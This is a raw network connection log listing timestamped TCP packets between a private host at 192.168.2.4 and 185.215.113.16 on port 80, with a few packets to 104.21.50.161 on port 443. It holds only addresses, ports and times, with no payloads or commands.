Dec 14, 2024 23:58:36.955162048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.955162048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.958256960 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.958386898 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.958421946 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.958504915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.961697102 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.961827040 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.961843967 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.961968899 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.965188980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.965277910 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.965369940 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.965370893 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.968564987 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.968694925 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.968723059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.968805075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.972001076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.972120047 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.972155094 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.972234964 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.975471020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.975564957 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.975640059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.975640059 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.978895903 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.979006052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.979053020 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.979053020 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.982315063 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.982459068 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.982505083 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.982505083 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.985838890 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.985892057 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.986021996 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.986021996 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.989195108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.989315033 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.989347935 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.989435911 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.992608070 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.992727041 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.992794991 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.992795944 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.996118069 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.996189117 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.996337891 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.996337891 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.999522924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.999605894 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.999685049 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.999685049 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.002943993 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.003066063 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.003118038 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.003118038 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.006460905 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.006515980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.006653070 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.006653070 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.009802103 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.009954929 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.009953976 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.010083914 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.013222933 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.013338089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.013381958 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.013381958 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.016686916 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.016789913 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.016908884 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.016910076 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.020086050 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.020190001 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.020292044 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.020344019 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.078491926 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.078556061 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.078655005 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.078655005 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.079333067 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.079427004 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.079490900 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.079536915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.082191944 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.082250118 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.082340002 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.082534075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.085031033 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.085078955 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.085134983 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.085318089 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.085630894 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:37.085680008 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:37.085891962 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:37.087882042 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.087939024 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.088015079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.088062048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.090637922 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.090693951 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.090768099 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.090812922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.093419075 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.093460083 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.093555927 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.093724966 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.096126080 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.096182108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.096277952 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.096470118 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.098798037 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.098845959 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.098920107 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.099134922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.101413965 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.101457119 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.101531982 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.101586103 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.103955984 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.104007959 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.104074001 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.104255915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.106494904 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.106563091 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.106637955 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.106688976 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.109044075 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.109100103 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.109169960 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.109328985 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.111474991 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.111522913 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.111613989 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.111660957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.113919973 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.113990068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.114061117 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.114108086 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.116323948 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.116383076 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.116470098 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.116518021 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.118695974 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.118763924 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.118849993 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.118902922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.121042967 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.121109962 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.121180058 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.121221066 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.123358965 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.123421907 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.123502970 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.123554945 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.125663996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.125715017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.125781059 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.125822067 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.127929926 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.127994061 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.128071070 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.128113031 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.130183935 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.130251884 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.130311966 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.130357981 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.132431030 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.132489920 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.132563114 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.132605076 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.134655952 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.134727955 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.134790897 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.134836912 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.136831999 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.136898041 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.136984110 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.137025118 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.139035940 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.139091015 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.139161110 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.139208078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.141225100 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.141283035 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.141328096 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.141366005 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.142422915 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.142474890 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.142532110 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.142574072 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.143662930 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.143724918 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.143783092 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.143827915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.144819021 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.144887924 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.144959927 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.145000935 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.146040916 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.146084070 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.146172047 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.146215916 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.147228956 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.147281885 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.147370100 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.147417068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.148432970 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.148497105 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.148569107 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.148614883 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.149657965 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.149709940 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.149769068 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.149808884 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.150851965 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.150916100 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.150974035 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.151019096 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.152055025 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.152111053 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.152281046 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.152326107 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.153254032 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.153297901 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.153378963 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.153423071 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.154474974 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.154520988 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.154620886 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.154664040 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.155669928 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.155715942 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.155807018 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.155852079 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.156877041 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.156930923 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.157001972 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.157047987 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.158090115 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.158134937 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.158219099 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.158262968 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.159282923 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.159338951 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.159415007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.159457922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.160495043 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.160562038 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.160613060 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.160654068 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.161696911 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.161770105 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.161849976 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.161899090 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.162908077 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.162952900 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.163034916 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.163084984 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.164165020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.164216995 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.164230108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.164268017 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.165308952 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.165360928 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.165436029 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.165478945 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.166518927 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.166593075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.166641951 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.166691065 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.167722940 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.167785883 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.167861938 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.167911053 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.168951988 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.168998957 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.169049025 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.169091940 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.170128107 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.170186043 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.170250893 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.170299053 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.171329021 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.171634912 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.270524025 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.270581961 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.270620108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.270761967 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.270893097 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.271068096 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.271074057 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.271163940 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.272064924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.272116899 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.272192001 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.272241116 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.273302078 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.273355961 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.273427963 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.273478985 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.274485111 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.274547100 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.274610996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.274660110 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.275691986 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.275743961 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.275842905 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.275890112 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.276880026 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.276933908 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.277029991 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.277077913 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.278076887 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.278132915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.278212070 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.278258085 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.279269934 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.279333115 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.279427052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.279476881 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.280543089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.280596972 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.280630112 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.280682087 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.281663895 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.281714916 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.281800032 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.281850100 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.282819986 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.282871962 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.283001900 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.283050060 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.283987999 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.284038067 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.284187078 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:37.284235954 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:37.285110950 CET	80	49841	185.215.113.16	192.168.2.4
